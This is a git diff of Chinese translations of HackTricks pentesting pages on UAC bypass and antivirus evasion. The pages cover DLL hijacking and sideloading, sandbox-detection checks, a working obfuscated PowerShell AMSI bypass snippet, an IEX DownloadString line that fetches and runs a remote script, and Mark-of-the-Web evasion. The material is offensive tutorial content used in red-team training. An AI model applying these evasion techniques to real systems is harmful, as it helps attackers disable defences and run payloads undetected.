-此外,如果你获得了某人正在使用的GUI会话(可能通过RDP),那里会有**一些作为管理员运行的工具**,你可以从中直接**以管理员身份运行**例如**cmd**,而不会再次受到UAC的提示,就像[**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif)。这可能会更加**隐蔽**。
+此外,如果您获得了某人正在使用的 GUI 会话(可能通过 RDP),有 **一些工具将以管理员身份运行**,您可以 **直接以管理员身份运行** 例如 **cmd**,而无需再次被 UAC 提示,如 [**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif)。这可能会更 **隐蔽**。
-### 嘈杂的暴力UAC绕过
+### 嘈杂的暴力破解 UAC 绕过
-如果你不在乎嘈杂,你可以始终**运行类似于**[**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin)这样的东西,**要求提升权限,直到用户接受为止**。
+如果您不在乎嘈杂,您可以始终 **运行类似** [**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin) 的工具,它 **会请求提升权限,直到用户接受它**。
-### 你自己的绕过 - 基本UAC绕过方法论
+### 您自己的绕过 - 基本 UAC 绕过方法
-如果你看看**UACME**,你会注意到**大多数UAC绕过都滥用了Dll劫持漏洞**(主要是将恶意dll写入_C:\Windows\System32_)。[阅读这篇文章以了解如何找到Dll劫持漏洞](../windows-local-privilege-escalation/dll-hijacking/)。
+如果您查看 **UACME**,您会注意到 **大多数 UAC 绕过利用 DLL 劫持漏洞**(主要是在 _C:\Windows\System32_ 中写入恶意 dll)。 [阅读此内容以了解如何找到 DLL 劫持漏洞](../windows-local-privilege-escalation/dll-hijacking/)。
-1. 找到一个将**自动提升权限**的二进制文件(检查当执行时它是否以高完整性级别运行)。
-2. 使用procmon找到可以受到**DLL劫持**攻击的“**NAME NOT FOUND**”事件。
-3. 你可能需要**将**DLL**写入**一些**受保护的路径**(比如C:\Windows\System32),在那里你没有写入权限。你可以通过以下方式绕过这一点:
-1. **wusa.exe**:Windows 7、8和8.1。它允许在受保护路径内提取CAB文件的内容(因为这个工具是以高完整性级别执行的)。
-2. **IFileOperation**:Windows 10。
-4. 准备一个**脚本**,将你的DLL复制到受保护路径中并执行易受攻击和自动提升权限的二进制文件。
+1. 找到一个会 **自动提升** 的二进制文件(检查它执行时是否以高完整性级别运行)。
+2. 使用 procmon 查找 "**NAME NOT FOUND**" 事件,这些事件可能会受到 **DLL 劫持** 的影响。
+3. 您可能需要在某些 **受保护路径**(如 C:\Windows\System32)中 **写入** DLL,而您没有写入权限。您可以通过以下方式绕过此限制:
+ 1. **wusa.exe**:Windows 7、8 和 8.1。它允许在受保护路径中提取 CAB 文件的内容(因为此工具是以高完整性级别执行的)。
+ 2. **IFileOperation**:Windows 10。
+4. 准备一个 **脚本**,将您的 DLL 复制到受保护路径中,并执行易受攻击的自动提升二进制文件。
-### 另一种UAC绕过技术
+### 另一种 UAC 绕过技术
-包括观察**自动提升权限的二进制文件**是否尝试**从注册表**中**读取**要**执行**的**二进制文件**或**命令**的**名称/路径**(如果二进制文件在**HKCU**中搜索这些信息,则更有趣)。
+该技术是观察一个 **自动提升的二进制文件** 是否尝试 **从注册表中读取** 要 **执行** 的 **二进制文件** 或 **命令** 的 **名称/路径**(如果该二进制文件在 **HKCU** 中搜索此信息,则更有趣)。
-使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和**自动化工作流**,使用世界上**最先进**的社区工具。\
-立即获取访问权限:
+
+
+使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
+今天就获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+
+{% hint style="success" %}
+学习和实践 AWS 黑客攻击:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客攻击: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+支持 HackTricks
+
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+
+
+{% endhint %}
diff --git a/windows-hardening/av-bypass.md b/windows-hardening/av-bypass.md
index 43c10d401..d304c6200 100644
--- a/windows-hardening/av-bypass.md
+++ b/windows-hardening/av-bypass.md
@@ -1,89 +1,89 @@
-# 反病毒软件(AV)绕过
+# Antivirus (AV) Bypass
+
+{% hint style="success" %}
+学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
+支持 HackTricks
-支持HackTricks的其他方式:
-
-- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF版HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-- 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
-- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
+{% endhint %}
-**本页由** [**@m2rc\_p**](https://twitter.com/m2rc\_p)**编写!**
+**本页面由** [**@m2rc\_p**](https://twitter.com/m2rc\_p)**撰写!**
-## **AV规避方法论**
+## **AV 规避方法论**
-目前,AV使用不同的方法来检查文件是否恶意,包括静态检测、动态分析,以及更高级的EDR中的行为分析。
+目前,AV 使用不同的方法来检查文件是否恶意,包括静态检测、动态分析,以及对于更高级的 EDR,行为分析。
### **静态检测**
-静态检测通过在二进制文件或脚本中标记已知的恶意字符串或字节数组,以及从文件本身提取信息(例如文件描述、公司名称、数字签名、图标、校验和等)来实现。这意味着使用已知的公共工具可能更容易被发现,因为它们可能已经被分析并标记为恶意。有几种方法可以绕过这种类型的检测:
+静态检测是通过标记已知的恶意字符串或字节数组在二进制文件或脚本中实现的,同时还提取文件本身的信息(例如,文件描述、公司名称、数字签名、图标、校验和等)。这意味着使用已知的公共工具可能更容易被捕获,因为它们可能已经被分析并标记为恶意。有几种方法可以绕过这种检测:
-- **加密**
+* **加密**
-如果您加密二进制文件,AV将无法检测到您的程序,但您需要某种加载程序来解密并在内存中运行程序。
+如果你加密了二进制文件,AV 将无法检测到你的程序,但你需要某种加载程序来解密并在内存中运行程序。
-- **混淆**
+* **混淆**
-有时,您只需要更改二进制文件或脚本中的一些字符串,就可以使其通过AV,但这可能是一项耗时的任务,具体取决于您尝试混淆的内容。
+有时你只需要更改二进制文件或脚本中的一些字符串就可以通过 AV,但这可能是一个耗时的任务,具体取决于你想混淆的内容。
-- **自定义工具**
+* **自定义工具**
-如果您开发自己的工具,就不会有已知的恶意签名,但这需要大量时间和精力。
+如果你开发自己的工具,将不会有已知的恶意签名,但这需要大量的时间和精力。
{% hint style="info" %}
-检查Windows Defender静态检测的一个好方法是使用[ThreatCheck](https://github.com/rasta-mouse/ThreatCheck)。它基本上将文件分成多个段,然后要求Defender分别扫描每个段,这样,它可以准确告诉您在二进制文件中有哪些被标记的字符串或字节。
+检查 Windows Defender 静态检测的一个好方法是 [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck)。它基本上将文件分成多个部分,然后让 Defender 分别扫描每个部分,这样可以准确告诉你在二进制文件中标记的字符串或字节。
{% endhint %}
-我强烈建议您查看这个关于实际AV规避的[YouTube播放列表](https://www.youtube.com/playlist?list=PLj05gPj8rk\_pkb12mDe4PgYZ5qPxhGKGf)。
+我强烈建议你查看这个 [YouTube 播放列表](https://www.youtube.com/playlist?list=PLj05gPj8rk\_pkb12mDe4PgYZ5qPxhGKGf) 关于实用的 AV 规避。
### **动态分析**
-动态分析是指AV在沙箱中运行您的二进制文件并监视恶意活动(例如尝试解密并读取浏览器密码,对LSASS执行minidump等)。这部分可能会更加棘手,但以下是一些可以用来规避沙箱的方法。
+动态分析是指 AV 在沙箱中运行你的二进制文件并监视恶意活动(例如,尝试解密并读取浏览器的密码,执行 LSASS 的小转储等)。这一部分可能更难处理,但这里有一些你可以做的事情来规避沙箱。
-- **执行前休眠**,具体取决于实现方式,这可能是绕过AV动态分析的好方法。AV需要很短的时间来扫描文件,以免打断用户的工作流程,因此使用长时间的休眠可能会干扰二进制文件的分析。问题在于许多AV沙箱可能会根据实现方式跳过休眠。
+* **执行前休眠** 根据实现方式,这可能是绕过 AV 动态分析的好方法。AV 扫描文件的时间非常短,以免打断用户的工作流程,因此使用长时间的休眠可以干扰二进制文件的分析。问题是许多 AV 的沙箱可以根据实现方式跳过休眠。
+* **检查机器资源** 通常沙箱可用的资源非常少(例如,< 2GB RAM),否则它们可能会减慢用户的机器。你也可以在这里发挥创造力,例如检查 CPU 的温度或风扇速度,并不是所有内容都会在沙箱中实现。
+* **特定机器检查** 如果你想针对加入“contoso.local”域的用户的工作站,你可以检查计算机的域以查看是否与指定的域匹配,如果不匹配,你可以让程序退出。
-- **检查计算机资源**,通常沙箱的资源非常有限(例如< 2GB RAM),否则可能会减慢用户的计算机。您还可以在这里发挥创造力,例如通过检查CPU的温度或甚至风扇转速,不是所有内容都会在沙箱中实现。
+事实证明,Microsoft Defender 的沙箱计算机名是 HAL9TH,因此,你可以在恶意软件引爆前检查计算机名,如果名称匹配 HAL9TH,则意味着你在 Defender 的沙箱中,因此可以让程序退出。
-- **特定于机器的检查**,如果您想针对加入“contoso.local”域的工作站用户进行操作,可以检查计算机的域,看看是否与您指定的域匹配,如果不匹配,您可以让程序退出。
+.png)
来源: https://youtu.be/StSLxFbVz0M?t=1439
-事实证明,Microsoft Defender的沙箱计算机名是HAL9TH,因此,您可以在引爆前检查恶意软件中的计算机名,如果名称与HAL9TH匹配,则表示您在Defender的沙箱中,因此可以让程序退出。
+一些来自 [@mgeeky](https://twitter.com/mariuszbit) 的非常好的建议,用于对抗沙箱
-来源:https://youtu.be/StSLxFbVz0M?t=1439
+.png)
红队 VX Discord #malware-dev 频道
-[@mgeeky](https://twitter.com/mariuszbit)提供的其他一些针对沙箱的非常好的技巧
+正如我们在这篇文章中之前所说,**公共工具**最终会被 **检测到**,所以你应该问自己一个问题:
-Red Team VX Discord #malware-dev频道
+例如,如果你想转储 LSASS,**你真的需要使用 mimikatz 吗**?或者你可以使用一个不太知名的项目来转储 LSASS。
-正如我们在本文中之前所说,**公共工具**最终将**被检测到**,因此,您应该问自己一个问题:
-
-例如,如果您想转储LSASS,**您真的需要使用mimikatz**吗?还是您可以使用一个不太知名但也可以转储LSASS的项目。
-
-正确答案可能是后者。以mimikatz为例,它可能是AV和EDR中最被标记的恶意软件之一,虽然项目本身非常酷,但要绕过AV,与其使用它来实现目标,不如寻找其他替代方案。
+正确的答案可能是后者。以 mimikatz 为例,它可能是被 AV 和 EDR 标记的最多的恶意软件之一,尽管该项目本身非常酷,但在绕过 AV 时使用它也是一场噩梦,因此只需寻找替代方案来实现你的目标。
{% hint style="info" %}
-在修改用于规避的有效负载时,请确保在defender中**关闭自动样本提交**,并且,请认真对待,**不要将其上传到VIRUSTOTAL**,如果您的目标是长期实现规避。如果要检查特定AV是否检测到您的有效负载,请在虚拟机上安装它,尝试关闭自动样本提交,并在那里测试,直到您对结果满意为止。
+在修改你的有效载荷以进行规避时,请确保 **关闭 Defender 的自动样本提交**,并且请认真考虑,**如果你的目标是长期规避,请不要上传到 VIRUSTOTAL**。如果你想检查你的有效载荷是否被特定 AV 检测到,请在虚拟机上安装它,尝试关闭自动样本提交,并在那里进行测试,直到你对结果满意为止。
{% endhint %}
-## EXE与DLL
+## EXEs 与 DLLs
-在可能的情况下,始终**优先使用DLL进行规避**,根据我的经验,DLL文件通常**检测和分析较少**,因此这是一个非常简单的技巧,可用于在某些情况下避免检测(如果您的有效负载有某种以DLL运行的方式)。
+每当可能时,总是 **优先使用 DLL 进行规避**,根据我的经验,DLL 文件通常 **被检测和分析的概率更低**,因此在某些情况下使用它是一种非常简单的技巧(当然前提是你的有效载荷有某种方式以 DLL 的形式运行)。
-正如我们在这张图片中看到的,Havoc的DLL有效负载在antiscan.me中的检测率为4/26,而EXE有效负载的检测率为7/26。
+正如我们在这张图片中看到的,Havoc 的 DLL 有效载荷在 antiscan.me 上的检测率为 4/26,而 EXE 有效载荷的检测率为 7/26。
-.png)
antiscan.me对比普通Havoc EXE有效负载与普通Havoc DLL的检测率
+antiscan.me 上普通 Havoc EXE 有效载荷与普通 Havoc DLL 的比较
-现在我们将展示一些您可以使用DLL文件的技巧,以使其更加隐蔽。
-## DLL 侧加载 & 代理
+现在我们将展示一些你可以使用 DLL 文件的技巧,以便更加隐蔽。
-**DLL 侧加载** 利用加载器使用的 DLL 搜索顺序,通过将受害应用程序和恶意载荷放置在一起来实现。
+## DLL 侧载与代理
-您可以使用[Siofra](https://github.com/Cybereason/siofra)和以下 PowerShell 脚本检查易受 DLL 侧加载影响的程序:
+**DLL 侧载** 利用加载程序使用的 DLL 搜索顺序,通过将受害者应用程序和恶意有效载荷并排放置来实现。
+
+你可以使用 [Siofra](https://github.com/Cybereason/siofra) 和以下 PowerShell 脚本检查易受 DLL 侧载影响的程序:
{% code overflow="wrap" %}
```powershell
@@ -94,17 +94,19 @@ C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hija
```
{% endcode %}
-这个命令将输出在"C:\Program Files\\"目录下易受DLL劫持影响的程序列表,以及它们尝试加载的DLL文件。
+此命令将输出“C:\Program Files\\”中易受DLL劫持的程序列表及其尝试加载的DLL文件。
-我强烈建议你**自己探索DLL劫持/侧载程序**,这种技术如果正确使用非常隐蔽,但如果你使用公开已知的DLL侧载程序,可能会很容易被发现。
+我强烈建议您**自己探索可被DLL劫持/侧载的程序**,如果正确执行,这种技术相当隐蔽,但如果您使用公开已知的DLL侧载程序,可能会很容易被抓住。
-仅仅通过放置一个恶意DLL并使用程序期望加载的名称,是无法加载你的有效负载的,因为程序期望在该DLL中有一些特定的函数,为了解决这个问题,我们将使用另一种称为**DLL代理/转发**的技术。
+仅仅放置一个恶意DLL,其名称是程序期望加载的,并不会加载您的有效载荷,因为程序期望该DLL中有一些特定的函数。为了解决这个问题,我们将使用另一种技术,称为**DLL代理/转发**。
-**DLL代理**将程序从代理(和恶意)DLL发出的调用转发到原始DLL,从而保留程序的功能并能够处理执行你的有效负载。
+**DLL代理**将程序从代理(和恶意)DLL发出的调用转发到原始DLL,从而保留程序的功能并能够处理您的有效载荷的执行。
我将使用[@flangvik](https://twitter.com/Flangvik/)的[SharpDLLProxy](https://github.com/Flangvik/SharpDllProxy)项目。
以下是我遵循的步骤:
+
+{% code overflow="wrap" %}
```
1. Find an application vulnerable to DLL Sideloading (siofra or using Process Hacker)
2. Generate some shellcode (I used Havoc C2)
@@ -113,7 +115,7 @@ C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hija
```
{% endcode %}
-最后一个命令将给我们2个文件:一个DLL源代码模板和原始重命名的DLL。
+最后一个命令将给我们两个文件:一个 DLL 源代码模板和重命名后的原始 DLL。
@@ -127,19 +129,19 @@ C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hija
-我们的shellcode(使用[SGN](https://github.com/EgeBalci/sgn)编码)和代理DLL在[antiscan.me](https://antiscan.me)上都有0/26的检测率!我会称之为成功。
+我们的 shellcode(使用 [SGN](https://github.com/EgeBalci/sgn) 编码)和代理 DLL 在 [antiscan.me](https://antiscan.me) 上的检测率为 0/26!我会称之为成功。
.png)
{% hint style="info" %}
-我**强烈建议**您观看[S3cur3Th1sSh1t的twitch VOD](https://www.twitch.tv/videos/1644171543)关于DLL Sideloading的内容,还有[ippsec的视频](https://www.youtube.com/watch?v=3eROsG_WNpE)以更深入地了解我们讨论的内容。
+我 **强烈推荐** 你观看 [S3cur3Th1sSh1t 的 twitch VOD](https://www.twitch.tv/videos/1644171543) 关于 DLL 侧载,以及 [ippsec 的视频](https://www.youtube.com/watch?v=3eROsG\_WNpE) 以更深入地了解我们讨论的内容。
{% endhint %}
## [**Freeze**](https://github.com/optiv/Freeze)
-`Freeze是一个绕过EDR的载荷工具包,使用挂起进程、直接系统调用和替代执行方法`
+`Freeze 是一个用于通过挂起进程、直接系统调用和替代执行方法绕过 EDR 的有效载荷工具包`
-您可以使用Freeze以隐秘的方式加载和执行您的shellcode。
+你可以使用 Freeze 以隐秘的方式加载和执行你的 shellcode。
```
Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freeze.git && cd Freeze && go build Freeze.go)
1. Generate some shellcode, in this case I used Havoc C2.
@@ -149,46 +151,46 @@ Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freez
{% hint style="info" %}
-规避只是一场猫鼠游戏,今天有效的方法明天可能被检测出来,因此永远不要只依赖一个工具,如果可能的话,尝试链接多种规避技术。
+规避只是猫和老鼠的游戏,今天有效的方法明天可能会被检测到,因此永远不要仅依赖一个工具,如果可能,尝试将多个规避技术结合起来。
{% endhint %}
## AMSI(反恶意软件扫描接口)
-AMSI旨在防止"[无文件恶意软件](https://en.wikipedia.org/wiki/Fileless\_malware)"。最初,防病毒软件只能扫描**磁盘上的文件**,因此如果您可以在**内存中直接执行有效载荷**,那么防病毒软件无法阻止它,因为它没有足够的可见性。
+AMSI的创建是为了防止“[无文件恶意软件](https://en.wikipedia.org/wiki/Fileless\_malware)”。最初,AV只能扫描**磁盘上的文件**,因此如果你能够以某种方式**直接在内存中执行有效载荷**,AV就无法采取任何措施来阻止它,因为它没有足够的可见性。
-AMSI功能已集成到Windows的以下组件中。
+AMSI功能集成在Windows的以下组件中。
-- 用户帐户控制(UAC)(提升EXE、COM、MSI或ActiveX安装)
-- PowerShell(脚本、交互使用和动态代码评估)
-- Windows脚本宿主(wscript.exe和cscript.exe)
-- JavaScript和VBScript
-- Office VBA宏
+* 用户帐户控制,或UAC(提升EXE、COM、MSI或ActiveX安装)
+* PowerShell(脚本、交互使用和动态代码评估)
+* Windows脚本宿主(wscript.exe和cscript.exe)
+* JavaScript和VBScript
+* Office VBA宏
-它允许防病毒解决方案通过以未加密和未混淆的形式公开脚本内容来检查脚本行为。
+它允许杀毒软件通过以未加密和未混淆的形式暴露脚本内容来检查脚本行为。
-运行`IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')`将在Windows Defender上产生以下警报。
+运行 `IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')` 将在Windows Defender上产生以下警报。
.png)
-请注意,它在路径之前加上`amsi:`,然后是脚本运行的可执行文件的路径,本例中为powershell.exe
+注意它是如何在脚本运行的可执行文件路径前加上 `amsi:` 的,在这种情况下是powershell.exe。
-我们没有将任何文件写入磁盘,但由于AMSI的存在,仍然在内存中被捕获。
+我们没有将任何文件写入磁盘,但仍然因为AMSI在内存中被捕获。
-有几种方法可以规避AMSI:
+有几种方法可以绕过AMSI:
-- **混淆**
+* **混淆**
-由于AMSI主要用于静态检测,因此修改您尝试加载的脚本可能是规避检测的一种好方法。
+由于AMSI主要依赖静态检测,因此修改你尝试加载的脚本可能是规避检测的好方法。
-但是,即使脚本有多个层,AMSI也有解混淆脚本的能力,因此,取决于如何执行混淆,混淆可能不是一个好选择。这使得规避并不是那么直截了当。尽管有时,您只需要更改几个变量名,就可以规避检测,因此这取决于某些内容是否已被标记。
+然而,AMSI有能力解混淆脚本,即使它有多层,因此混淆可能是一个糟糕的选择,具体取决于其实现方式。这使得规避变得不那么简单。尽管有时,你所需要做的只是更改几个变量名称,你就可以成功,因此这取决于某个内容被标记的程度。
-- **AMSI绕过**
+* **AMSI绕过**
-由于AMSI是通过将DLL加载到powershell(也包括cscript.exe、wscript.exe等)进程中来实现的,因此即使作为非特权用户运行,也很容易篡改它。由于AMSI实现中存在这个缺陷,研究人员已经找到了多种规避AMSI扫描的方法。
+由于AMSI是通过将DLL加载到powershell(也包括cscript.exe、wscript.exe等)进程中来实现的,因此即使以非特权用户身份运行,也可以轻松篡改它。由于AMSI实现中的这个缺陷,研究人员发现了多种规避AMSI扫描的方法。
**强制错误**
-强制AMSI初始化失败(amsiInitFailed)将导致当前进程不会启动扫描。最初由[Matt Graeber](https://twitter.com/mattifestation)披露,微软已经开发了一个签名来防止更广泛的使用。
+强制AMSI初始化失败(amsiInitFailed)将导致当前进程不会启动扫描。最初这是由[Matt Graeber](https://twitter.com/mattifestation)披露的,微软已经开发了一个签名以防止更广泛的使用。
{% code overflow="wrap" %}
```powershell
@@ -196,9 +198,9 @@ AMSI功能已集成到Windows的以下组件中。
```
{% endcode %}
-只需要一行PowerShell代码就可以使AMSI对当前PowerShell进程无效。当然,这行代码已经被AMSI本身标记,因此需要进行一些修改才能使用这种技术。
+只需一行 PowerShell 代码就可以使当前 PowerShell 进程无法使用 AMSI。 这行代码当然已经被 AMSI 本身标记,因此需要进行一些修改才能使用此技术。
-这是我从这个[Github Gist](https://gist.github.com/r00t-3xp10it/a0c6a368769eec3d3255d4814802b5db)中获取的修改后的AMSI绕过方法。
+这是我从这个 [Github Gist](https://gist.github.com/r00t-3xp10it/a0c6a368769eec3d3255d4814802b5db) 中获取的修改版 AMSI 绕过。
```powershell
Try{#Ams1 bypass technic nº 2
$Xdatabase = 'Utils';$Homedrive = 'si'
@@ -212,53 +214,57 @@ $Spotfix = $SDcleanup.GetField($Rawdata,"$ComponentDeviceId,Static")
$Spotfix.SetValue($null,$true)
}Catch{Throw $_}
```
-**内存篡改**
+请记住,这篇文章发布后可能会被标记,因此如果你的计划是保持隐蔽,就不应该发布任何代码。
-这种技术最初是由[@RastaMouse](https://twitter.com/\_RastaMouse/)发现的,它涉及查找amsi.dll中“AmsiScanBuffer”函数的地址(负责扫描用户提供的输入),并用指令覆盖它以返回E\_INVALIDARG代码,这样,实际扫描的结果将返回0,被解释为干净的结果。
+**内存补丁**
+
+该技术最初由 [@RastaMouse](https://twitter.com/\_RastaMouse/) 发现,涉及在 amsi.dll 中找到 "AmsiScanBuffer" 函数的地址(负责扫描用户提供的输入),并用返回 E\_INVALIDARG 代码的指令覆盖它,这样,实际扫描的结果将返回 0,这被解释为干净的结果。
{% hint style="info" %}
-请阅读[https://rastamouse.me/memory-patching-amsi-bypass/](https://rastamouse.me/memory-patching-amsi-bypass/)以获取更详细的解释。
+请阅读 [https://rastamouse.me/memory-patching-amsi-bypass/](https://rastamouse.me/memory-patching-amsi-bypass/) 以获取更详细的解释。
{% endhint %}
-还有许多其他用于绕过PowerShell的AMSI的技术,请查看[**此页面**](basic-powershell-for-pentesters/#amsi-bypass)和[此存储库](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell)以了解更多信息。
+还有许多其他技术可以通过 PowerShell 绕过 AMSI,查看 [**此页面**](basic-powershell-for-pentesters/#amsi-bypass) 和 [此仓库](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) 以了解更多信息。
+
+或者这个脚本通过内存补丁将补丁应用于每个新的 PowerShell。
## 混淆
-有几种工具可用于**混淆C#明文代码**,生成**元编程模板**以编译二进制文件或**混淆已编译的二进制文件**,例如:
+有几种工具可以用来 **混淆 C# 明文代码**,生成 **元编程模板** 以编译二进制文件或 **混淆已编译的二进制文件**,例如:
-* [**InvisibilityCloak**](https://github.com/h4wkst3r/InvisibilityCloak)**:C#混淆器**
-* [**Obfuscator-LLVM**](https://github.com/obfuscator-llvm/obfuscator):该项目的目标是提供[LLVM](http://www.llvm.org/)编译套件的开源分支,能够通过[代码混淆](http://en.wikipedia.org/wiki/Obfuscation\_\(software\))和防篡改提供增强软件安全性。
-* [**ADVobfuscator**](https://github.com/andrivet/ADVobfuscator):ADVobfuscator演示了如何使用`C++11/14`语言在编译时生成混淆代码,而不使用任何外部工具或修改编译器。
-* [**obfy**](https://github.com/fritzone/obfy):通过C++模板元编程框架生成一层混淆操作,使想要破解应用程序的人的生活变得更加困难。
-* [**Alcatraz**](https://github.com/weak1337/Alcatraz)**:Alcatraz是一个能够混淆各种不同pe文件的x64二进制混淆器,包括:.exe、.dll、.sys
-* [**metame**](https://github.com/a0rtega/metame):Metame是一个用于任意可执行文件的简单变形代码引擎。
-* [**ropfuscator**](https://github.com/ropfuscator/ropfuscator):ROPfuscator是一个针对LLVM支持的语言的细粒度代码混淆框架,使用ROP(返回导向编程)在汇编代码级别混淆程序,将常规指令转换为ROP链,破坏我们对正常控制流的自然概念。
-* [**Nimcrypt**](https://github.com/icyguider/nimcrypt):Nimcrypt是一个用Nim编写的.NET PE加密器。
-* [**inceptor**](https://github.com/klezVirus/inceptor)**:Inceptor能够将现有的EXE/DLL转换为shellcode,然后加载它们。
+* [**InvisibilityCloak**](https://github.com/h4wkst3r/InvisibilityCloak)**: C# 混淆器**
+* [**Obfuscator-LLVM**](https://github.com/obfuscator-llvm/obfuscator): 该项目的目的是提供一个开源的 LLVM 编译套件分支,能够通过 [代码混淆](http://en.wikipedia.org/wiki/Obfuscation\_\(software\)) 和防篡改提供增强的软件安全性。
+* [**ADVobfuscator**](https://github.com/andrivet/ADVobfuscator): ADVobfuscator 演示如何使用 `C++11/14` 语言在编译时生成混淆代码,而无需使用任何外部工具且不修改编译器。
+* [**obfy**](https://github.com/fritzone/obfy): 添加一层由 C++ 模板元编程框架生成的混淆操作,这将使想要破解应用程序的人稍微困难一些。
+* [**Alcatraz**](https://github.com/weak1337/Alcatraz)**:** Alcatraz 是一个 x64 二进制混淆器,能够混淆各种不同的 pe 文件,包括:.exe, .dll, .sys
+* [**metame**](https://github.com/a0rtega/metame): Metame 是一个简单的变形代码引擎,适用于任意可执行文件。
+* [**ropfuscator**](https://github.com/ropfuscator/ropfuscator): ROPfuscator 是一个细粒度的代码混淆框架,适用于使用 ROP(面向返回的编程)的 LLVM 支持语言。ROPfuscator 通过将常规指令转换为 ROP 链,在汇编代码级别混淆程序,阻碍我们对正常控制流的自然概念。
+* [**Nimcrypt**](https://github.com/icyguider/nimcrypt): Nimcrypt 是一个用 Nim 编写的 .NET PE 加密器。
+* [**inceptor**](https://github.com/klezVirus/inceptor)**:** Inceptor 能够将现有的 EXE/DLL 转换为 shellcode,然后加载它们。
-## SmartScreen和MoTW
+## SmartScreen 和 MoTW
-当从互联网下载并执行一些可执行文件时,您可能会看到此屏幕。
+你可能在从互联网下载某些可执行文件并执行它们时见过这个屏幕。
-Microsoft Defender SmartScreen是一种旨在保护最终用户免受运行潜在恶意应用程序的安全机制。
+Microsoft Defender SmartScreen 是一种安全机制,旨在保护最终用户免受运行潜在恶意应用程序的影响。
.png)
-SmartScreen主要采用基于声誉的方法,意味着不常见的下载应用程序将触发SmartScreen,从而警告并阻止最终用户执行文件(尽管仍可以通过单击更多信息 -> 仍然运行来执行文件)。
+SmartScreen 主要采用基于声誉的方法,这意味着不常下载的应用程序将触发 SmartScreen,从而警告并阻止最终用户执行该文件(尽管可以通过点击更多信息 -> 无论如何运行来执行该文件)。
-**MoTW**(Mark of The Web)是一个带有Zone.Identifier名称的[NTFS备用数据流](https://en.wikipedia.org/wiki/NTFS#Alternate\_data\_stream\_\(ADS\)),在从互联网下载文件时会自动创建,以及它被下载的URL。
+**MoTW**(网络标记)是一个 [NTFS 备用数据流](https://en.wikipedia.org/wiki/NTFS#Alternate\_data\_stream\_\(ADS\)),其名称为 Zone.Identifier,下载来自互联网的文件时会自动创建,并附带下载的 URL。
-.png)
检查从互联网下载的文件的Zone.Identifier ADS。
+检查从互联网下载的文件的 Zone.Identifier ADS。
{% hint style="info" %}
-重要提示:使用**受信任的**签名证书签名的可执行文件**不会触发SmartScreen**。
+重要的是要注意,使用 **受信任** 签名证书签名的可执行文件 **不会触发 SmartScreen**。
{% endhint %}
-防止您的有效载荷获得Mark of The Web的一种非常有效的方法是将它们打包到某种容器中,比如ISO。这是因为Mark-of-the-Web(MOTW)**无法**应用于**非NTFS**卷。
+防止你的有效载荷获得网络标记的一个非常有效的方法是将它们打包在某种容器中,例如 ISO。这是因为网络标记(MOTW) **不能** 应用于 **非 NTFS** 卷。
.png)
-[**PackMyPayload**](https://github.com/mgeeky/PackMyPayload/)是一个将有效载荷打包到输出容器中以规避Mark-of-the-Web的工具。
